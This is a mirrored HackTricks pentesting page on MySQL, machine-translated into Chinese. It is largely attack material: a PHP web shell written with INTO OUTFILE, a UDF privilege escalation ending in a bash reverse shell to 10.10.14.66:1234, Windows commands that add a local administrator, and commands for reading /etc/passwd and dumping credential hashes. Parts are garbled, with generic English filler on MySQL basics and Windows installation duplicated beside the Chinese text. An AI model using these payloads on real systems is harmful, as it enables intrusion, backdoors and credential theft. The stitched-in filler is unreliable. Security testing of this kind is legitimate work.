Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-mysql.md
Translator workflow a21a0e7217 Translated to Chinese
2023-08-03 19:12:22 +00:00

34 KiB
Raw Blame History

3306 - Pentesting Mysql

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

RootedCON 是西班牙最重要的网络安全活动之一,也是欧洲最重要的网络安全活动之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士的热点交流平台。

{% embed url="https://www.rootedcon.com/" %}

基本信息

MySQL是一个免费的开源关系型数据库管理系统RDBMS使用结构化查询语言SQL)。来自这里

默认端口: 3306

3306/tcp open  mysql

连接

本地

mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

远程

MySQL allows remote connections by default, which means that it can be accessed from other machines on the network. This can be a security risk if proper precautions are not taken.

MySQL默认允许远程连接这意味着它可以从网络上的其他计算机访问。如果不采取适当的预防措施这可能会带来安全风险。

To secure remote access to MySQL, you can follow these steps:

要保护MySQL的远程访问安全可以按照以下步骤进行操作

  1. Bind MySQL to a specific IP address: By default, MySQL listens on all available IP addresses. You can change this by modifying the bind-address parameter in the MySQL configuration file (my.cnf). Set it to the IP address you want MySQL to listen on.

    1. 将MySQL绑定到特定的IP地址默认情况下MySQL监听所有可用的IP地址。您可以通过修改MySQL配置文件my.cnf)中的bind-address参数来更改此设置。将其设置为您希望MySQL监听的IP地址。

  2. Create a firewall rule: Configure your firewall to only allow incoming connections to the MySQL port (default is 3306) from trusted IP addresses or networks. This will prevent unauthorized access to the MySQL service.

    1. 创建防火墙规则配置防火墙仅允许来自受信任的IP地址或网络的MySQL端口默认为3306的入站连接。这将防止未经授权的访问MySQL服务。

  3. Use strong passwords: Ensure that all MySQL user accounts have strong, unique passwords. Avoid using default or easily guessable passwords.

    1. 使用强密码确保所有MySQL用户帐户都具有强大且唯一的密码。避免使用默认或容易猜测的密码。

  4. Limit privileges: Grant only the necessary privileges to MySQL user accounts. Avoid granting unnecessary privileges that could be exploited by an attacker.

    1. 限制权限仅向MySQL用户帐户授予必要的权限。避免授予攻击者可能利用的不必要的权限。

  5. Enable SSL/TLS encryption: Configure MySQL to use SSL/TLS encryption for secure communication between the client and the server. This will protect the data transmitted over the network from eavesdropping and tampering.

    1. 启用SSL/TLS加密配置MySQL使用SSL/TLS加密进行客户端和服务器之间的安全通信。这将保护通过网络传输的数据免受窃听和篡改。

By following these steps, you can enhance the security of your MySQL server and reduce the risk of unauthorized access or data breaches.

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

外部枚举

其中一些枚举操作需要有效的凭据

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

暴力破解

写入任何二进制数据

CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

MySQL命令

MySQL is a popular open-source relational database management system. It is widely used in web applications and is known for its speed and reliability. In this section, we will explore some commonly used MySQL commands for database management and manipulation.

Connecting to MySQL

To connect to a MySQL server, you can use the following command:

mysql -h <host> -u <username> -p

Replace <host> with the hostname or IP address of the MySQL server, <username> with the username, and <password> with the password.

Creating a Database

To create a new database, use the CREATE DATABASE command:

CREATE DATABASE <database_name>;

Replace <database_name> with the desired name for the database.

Selecting a Database

To select a database to work with, use the USE command:

USE <database_name>;

Replace <database_name> with the name of the database you want to select.

Creating a Table

To create a new table in a database, use the CREATE TABLE command:

CREATE TABLE <table_name> (
    <column1_name> <column1_type>,
    <column2_name> <column2_type>,
    ...
);

Replace <table_name> with the desired name for the table, <column1_name> with the name of the first column, <column1_type> with the data type of the first column, and so on.

Inserting Data

To insert data into a table, use the INSERT INTO command:

INSERT INTO <table_name> (<column1_name>, <column2_name>, ...)
VALUES (<value1>, <value2>, ...);

Replace <table_name> with the name of the table, <column1_name> and <column2_name> with the names of the columns you want to insert data into, and <value1>, <value2>, etc. with the corresponding values.

Querying Data

To retrieve data from a table, use the SELECT command:

SELECT <column1_name>, <column2_name>, ...
FROM <table_name>
WHERE <condition>;

Replace <column1_name>, <column2_name>, etc. with the names of the columns you want to retrieve, <table_name> with the name of the table, and <condition> with the condition that the data must meet.

Updating Data

To update data in a table, use the UPDATE command:

UPDATE <table_name>
SET <column1_name> = <new_value1>, <column2_name> = <new_value2>, ...
WHERE <condition>;

Replace <table_name> with the name of the table, <column1_name>, <column2_name>, etc. with the names of the columns you want to update, <new_value1>, <new_value2>, etc. with the new values, and <condition> with the condition that the data must meet.

Deleting Data

To delete data from a table, use the DELETE FROM command:

DELETE FROM <table_name>
WHERE <condition>;

Replace <table_name> with the name of the table and <condition> with the condition that the data must meet.

Dropping a Database

To drop a database, use the DROP DATABASE command:

DROP DATABASE <database_name>;

Replace <database_name> with the name of the database you want to drop.

Dropping a Table

To drop a table, use the DROP TABLE command:

DROP TABLE <table_name>;

Replace <table_name> with the name of the table you want to drop.

These are just a few of the many commands available in MySQL. By mastering these commands, you will have a solid foundation for managing and manipulating databases using MySQL.

show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;

mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

MySQL权限枚举

MySQL数据库是一种常用的关系型数据库管理系统用于存储和管理数据。在进行MySQL渗透测试时了解目标数据库的权限设置非常重要。通过枚举MySQL权限我们可以确定当前用户的权限级别并尝试利用可能存在的权限漏洞。

以下是一些常用的MySQL权限枚举技术

1. SHOW GRANTS

使用SHOW GRANTS语句可以查看当前用户的权限。这将显示当前用户被授予的所有权限。

SHOW GRANTS;

2. INFORMATION_SCHEMA

MySQL的INFORMATION_SCHEMA数据库存储了关于数据库、表、列和权限的元数据信息。我们可以查询INFORMATION_SCHEMA来获取有关权限的详细信息。

SELECT * FROM INFORMATION_SCHEMA.USER_PRIVILEGES;

3. mysql.user表

mysql.user表包含了MySQL用户的详细信息包括用户名、密码和权限。我们可以查询该表来获取有关用户权限的信息。

SELECT * FROM mysql.user;

4. SHOW GRANTS FOR

使用SHOW GRANTS FOR语句可以查看指定用户的权限。将<username>替换为要查询的用户名。

SHOW GRANTS FOR <username>;

5. mysql.db表

mysql.db表存储了数据库级别的权限信息。我们可以查询该表来获取有关数据库权限的信息。

SELECT * FROM mysql.db;

6. mysql.tables_priv表

mysql.tables_priv表存储了表级别的权限信息。我们可以查询该表来获取有关表权限的信息。

SELECT * FROM mysql.tables_priv;

7. mysql.columns_priv表

mysql.columns_priv表存储了列级别的权限信息。我们可以查询该表来获取有关列权限的信息。

SELECT * FROM mysql.columns_priv;

通过使用这些MySQL权限枚举技术我们可以更好地了解目标数据库的权限设置并发现可能存在的安全漏洞。

#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';

您可以在文档中查看每个权限的含义:https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html

MySQL文件远程命令执行

{% content-ref url="../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md" %} mysql-ssrf.md {% endcontent-ref %}

MySQL客户端任意读取文件

实际上,当您尝试将文件内容通过将数据加载到表中的方式发送给MySQL或MariaDB服务器时服务器会要求客户端读取文件并发送内容因此如果您能够篡改MySQL客户端以连接到您自己的MySQL服务器您就可以读取任意文件。
请注意,这是使用以下方式的行为:

load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

注意到“local”这个词
因为没有“local”你可能会得到

mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

初始 PoChttps://github.com/allyshka/Rogue-MySql-Server
在这篇论文中,您可以看到对攻击的完整描述,甚至如何扩展到 RCEhttps://paper.seebug.org/1113/
在这里,您可以找到攻击的概述:http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

RootedCON 是西班牙最重要的网络安全活动之一,也是欧洲最重要的活动之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士的热点聚会。

{% embed url="https://www.rootedcon.com/" %}

POST

Mysql 用户

如果 mysql 以 root 身份运行,那将非常有趣:

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1

mysqld.cnf的危险设置

来自https://academy.hackthebox.com/module/112/section/1238

设置 描述
user 设置MySQL服务将以哪个用户身份运行。
password 设置MySQL用户的密码。
admin_address 用于监听管理网络接口上的TCP/IP连接的IP地址。
debug 此变量指示当前的调试设置(日志中的敏感信息)。
sql_warnings 此变量控制单行INSERT语句在出现警告时是否生成信息字符串日志中的敏感信息
secure_file_priv 此变量用于限制数据导入和导出操作的影响范围。

特权升级

# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh

通过库进行权限提升

如果 mysql 服务器以 root 用户(或其他更高权限用户)运行,你可以让它执行命令。为此,你需要使用 用户自定义函数。而要创建用户自定义函数,你需要一个运行 mysql 的操作系统的

可以在 sqlmap 和 metasploit 中找到要使用的恶意库,方法是执行 locate "*lib_mysqludf_sys*" 命令。.so 文件是 Linux 库,.dllWindows 库,选择你需要的那个。

如果你 没有 这些库,你可以 寻找它们,或者下载这个 Linux C 代码 并在 Linux 受漏洞影响的机器上 编译 它:

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

现在你已经有了库作为特权用户root登录到Mysql中然后按照以下步骤进行操作

Linux

# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

Windows

Windows

MySQL can be installed on Windows using the official installer available on the MySQL website. Once installed, the MySQL service will be running in the background.

To connect to the MySQL server on Windows, you can use the MySQL Command Line Client or a graphical user interface (GUI) tool like MySQL Workbench.

To access the MySQL Command Line Client, open the Command Prompt and type mysql -u <username> -p. Replace <username> with the username you want to use to connect to the MySQL server. You will be prompted to enter the password for the specified username.

To use a GUI tool like MySQL Workbench, you will need to download and install it from the MySQL website. Once installed, open MySQL Workbench and click on the "+" icon in the "MySQL Connections" section to create a new connection. Enter the necessary details like the connection name, hostname, port, username, and password, and click "Test Connection" to verify the connection.

Once connected to the MySQL server, you can perform various tasks like creating databases, tables, and executing SQL queries.

Windows

MySQL可以使用MySQL官方网站上提供的官方安装程序在Windows上安装。安装完成后MySQL服务将在后台运行。

要连接到Windows上的MySQL服务器可以使用MySQL命令行客户端或图形用户界面GUI工具如MySQL Workbench。

要访问MySQL命令行客户端请打开命令提示符并键入mysql -u <username> -p。将<username>替换为要用于连接到MySQL服务器的用户名。然后您将被提示输入指定用户名的密码。

要使用MySQL Workbench等GUI工具您需要从MySQL网站下载并安装它。安装完成后打开MySQL Workbench单击“MySQL Connections”部分的“+”图标以创建新连接。输入必要的详细信息如连接名称、主机名、端口、用户名和密码然后单击“Test Connection”以验证连接。

连接到MySQL服务器后您可以执行各种任务如创建数据库、表和执行SQL查询。

# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

从文件中提取MySQL凭据

/etc/mysql/debian.cnf 文件中,您可以找到用户 debian-sys-maint明文密码

cat /etc/mysql/debian.cnf

您可以使用这些凭据登录到MySQL数据库。

在文件_/var/lib/mysql/mysql/user.MYD_中您可以找到MySQL用户的所有哈希值可以从数据库中的mysql.user中提取的哈希值

您可以通过以下方式提取它们:

grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

启用日志记录

您可以在/etc/mysql/my.cnf文件中取消注释以下行以启用mysql查询的日志记录

有用的文件

配置文件

  • windows *
  • config.ini
  • my.ini
  • windows\my.ini
  • winnt\my.ini
  • <InstDir>/mysql/data/
  • unix
  • my.cnf
  • /etc/my.cnf
  • /etc/mysql/my.cnf
  • /var/lib/mysql/my.cnf
  • ~/.my.cnf
  • /etc/my.cnf
  • 命令历史记录
  • ~/.mysql.history
  • 日志文件
  • connections.log
  • update.log
  • common.log

默认的MySQL数据库/表

{% tabs %} {% tab title="information_schema" %} ALL_PLUGINS
APPLICABLE_ROLES
CHARACTER_SETS
CHECK_CONSTRAINTS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENABLED_ROLES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
KEY_CACHES
OPTIMIZER_TRACE
PARAMETERS
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
SYSTEM_VARIABLES
TABLES
TABLESPACES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
INNODB_LOCKS
INNODB_TRX
INNODB_SYS_DATAFILES
INNODB_FT_CONFIG
INNODB_SYS_VIRTUAL
INNODB_CMP
INNODB_FT_BEING_DELETED
INNODB_CMP_RESET
INNODB_CMP_PER_INDEX
INNODB_CMPMEM_RESET
INNODB_FT_DELETED
INNODB_BUFFER_PAGE_LRU
INNODB_LOCK_WAITS
INNODB_TEMP_TABLE_INFO
INNODB_SYS_INDEXES
INNODB_SYS_TABLES
INNODB_SYS_FIELDS
INNODB_CMP_PER_INDEX_RESET
INNODB_BUFFER_PAGE
INNODB_FT_DEFAULT_STOPWORD
INNODB_FT_INDEX_TABLE
INNODB_FT_INDEX_CACHE
INNODB_SYS_TABLESPACES
INNODB_METRICS
INNODB_SYS_FOREIGN_COLS
INNODB_CMPMEM
INNODB_BUFFER_POOL_STATS
INNODB_SYS_COLUMNS
INNODB_SYS_FOREIGN
INNODB_SYS_TABLESTATS
GEOMETRY_COLUMNS
SPATIAL_REF_SYS
CLIENT_STATISTICS
INDEX_STATISTICS
USER_STATISTICS
INNODB_MUTEXES
TABLE_STATISTICS
INNODB_TABLESPACES_ENCRYPTION
user_variables
INNODB_TABLESPACES_SCRUBBING
INNODB_SYS_SEMAPHORE_WAITS {% endtab %}

{% tab title="mysql" %} columns_priv
column_stats
db
engine_cost
event
func
general_log
gtid_executed
gtid_slave_pos
help_category
help_keyword
help_relation
help_topic
host
index_stats
innodb_index_stats
innodb_table_stats
ndb_binlog_index
plugin
proc
procs_priv
proxies_priv
roles_mapping
server_cost
servers
slave_master_info
slave_relay_log_info
slave_worker_info
slow_log
tables_priv
table_stats
time_zone
time_zone_leap_second
time_zone_name
time_zone_transition
time_zone_transition_type
transaction_registry
user {% endtab %}

{% tab title="performance_schema" %} accounts
cond_instances
events_stages_current
events_stages_history
events_stages_history_long
events_stages_summary_by_account_by_event_name
events_stages_summary_by_host_by_event_name
events_stages_summary_by_thread_by_event_name
events_stages_summary_by_user_by_event_name
events_stages_summary_global_by_event_name
events_statements_current
events_statements_history
events_statements_history_long
events_statements_summary_by_account_by_event_name
events_statements_summary_by_digest
events_statements_summary_by_host_by_event_name
events_statements_summary_by_program
events_statements_summary_by_thread_by_event_name
events_statements_summary_by_user_by_event_name
events_statements_summary_global_by_event_name
events_transactions_current
events_transactions_history
events_transactions_history_long
events_transactions_summary_by_account_by_event_name
events_transactions_summary_by_host_by_event_name
events_transactions_summary_by_thread_by_event_name
events_transactions_summary_by_user_by_event_name
events_transactions_summary_global_by_event_name
events_waits_current
events_waits_history
events_waits_history_long
events_waits_summary_by_account_by_event_name
events_waits_summary_by_host_by_event_name
events_waits_summary_by_instance
events_waits_summary_by_thread_by_event_name
events_waits_summary_by_user_by_event_name
events_waits_summary_global_by_event_name
file_instances
file_summary_by_event_name
file_summary_by_instance
global_status
global_variables
host_cache
hosts
memory_summary_by_account_by_event_name
memory_summary_by_host_by_event_name
memory_summary_by_thread_by_event_name
memory_summary_by_user_by_event_name
memory_summary_global_by_event_name
metadata_locks
mutex_instances
objects_summary_global_by_type
performance_timers
prepared_statements_instances
replication_applier_configuration
replication_applier_status
replication_applier_status_by_coordinator
replication_applier_status_by_worker
replication_connection_configuration
replication_connection_status
replication_group_member_stats
replication_group_members
rwlock_instances
session_account_connect_attrs
session_connect_attrs
session_status
session_variables
setup_actors
setup_consumers
setup_instruments
setup_objects
setup_timers
socket_instances
socket_summary_by_event_name
socket_summary_by_instance
status_by_account
status_by_host
status_by_thread
status_by_user
table_handles
table_io_waits_summary_by_index_usage
table_io_waits_summary_by_table
table_lock_waits_summary_by_table
threads
user_variables_by_thread
users
variables_by_thread {% endtab %}

{% tab title="sys" %} host_summary
host_summary_by_file_io
host_summary_by_file_io_type
host_summary_by_stages
host_summary_by_statement_latency
host_summary_by_statement_type
innodb_buffer_stats_by_schema
innodb_buffer_stats_by_table
innodb_lock_waits
io_by_thread_by_latency
io_global_by_file_by_bytes
io_global_by_file_by_latency
io_global_by_wait_by_bytes
io_global_by_wait_by_latency
latest_file_io
memory_by_host_by_current_bytes
memory_by_thread_by_current_bytes
memory_by_user_by_current_bytes
memory_global_by_current_bytes
memory_global_total
metrics
processlist
ps_check_lost_instrumentation
schema_auto_increment_columns
schema_index_statistics
schema_object_overview
schema_redundant_indexes
schema_table_lock_waits
schema_table_statistics
schema_table_statistics_with_buffer
schema_tables_with_full_table_scans
schema_unused_indexes
session
session_ssl_status
statement_analysis
statements_with_errors_or_warnings
statements_with_full_table_scans
statements_with_runtimes_in_95th_percentile
statements_with_sorting
statements_with_temp_tables
sys_config
user_summary
user_summary_by_file_io
user_summary_by_file_io_type
user_summary_by_stages
user_summary_by_statement_latency
user_summary_by_statement_type
version
wait_classes_global_by_avg_latency
wait_classes_global_by_latency
waits_by_host_by_latency
waits_by_user_by_latency
waits_global_by_latency
x$host_summary
x$host_summary_by_file_io
x$host_summary_by_file_io_type
x$host_summary_by_stages
x$host_summary_by_statement_latency
x$host_summary_by_statement_type
x$innodb_buffer_stats_by_schema
x$innodb_buffer_stats_by_table
x$innodb_lock_waits
x$io_by_thread_by_latency
x$io_global_by_file_by_bytes
x$io_global_by_file_by_latency
x$io_global_by_wait_by_bytes
x$io_global_by_wait_by_latency
x$latest_file_io
x$memory_by_host_by_current_bytes
x$memory_by_thread_by_current_bytes
x$memory_by_user_by_current_bytes
x$memory_global_by_current_bytes
x$memory_global_total
x$processlist
x$ps_digest_95th_percentile_by_avg_us
x$ps_digest_avg_latency_distribution
x$ps_schema_table_statistics_io
x$schema_flattened_keys
x$schema_index_statistics
x$schema_table_lock_waits
x$schema_table_statistics
x$schema_table_statistics_with_buffer
x$schema_tables_with_full_table_scans
x$session
x$statement_analysis
x$statements_with_errors_or_warnings
x$statements_with_full_table_scans
x$statements_with_runtimes_in_95th_percentile
x$statements_with_sorting
x$statements_with_temp_tables
x$user_summary
x$user_summary_by_file_io
x$user_summary_by_file_io_type
x$user_summary_by_stages
x$user_summary_by_statement_latency
x$user_summary_by_statement_type
x$wait_classes_global_by_avg_latency
x$wait_classes_global_by_latency
x$waits_by_host_by_latency
x$waits_by_user_by_latency
x$waits_global_by_latency

HackTricks自动命令

Protocol_Name: MySql    #Protocol Abbreviation if there is one.
Port_Number:  3306     #Comma separated if there is more than one.
Protocol_Description: MySql     #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

https://book.hacktricks.xyz/pentesting/pentesting-mysql

Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost

Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'

RootedCON 是西班牙最重要的网络安全活动之一,也是欧洲最重要的活动之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士的热点交流平台。

{% embed url="https://www.rootedcon.com/" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥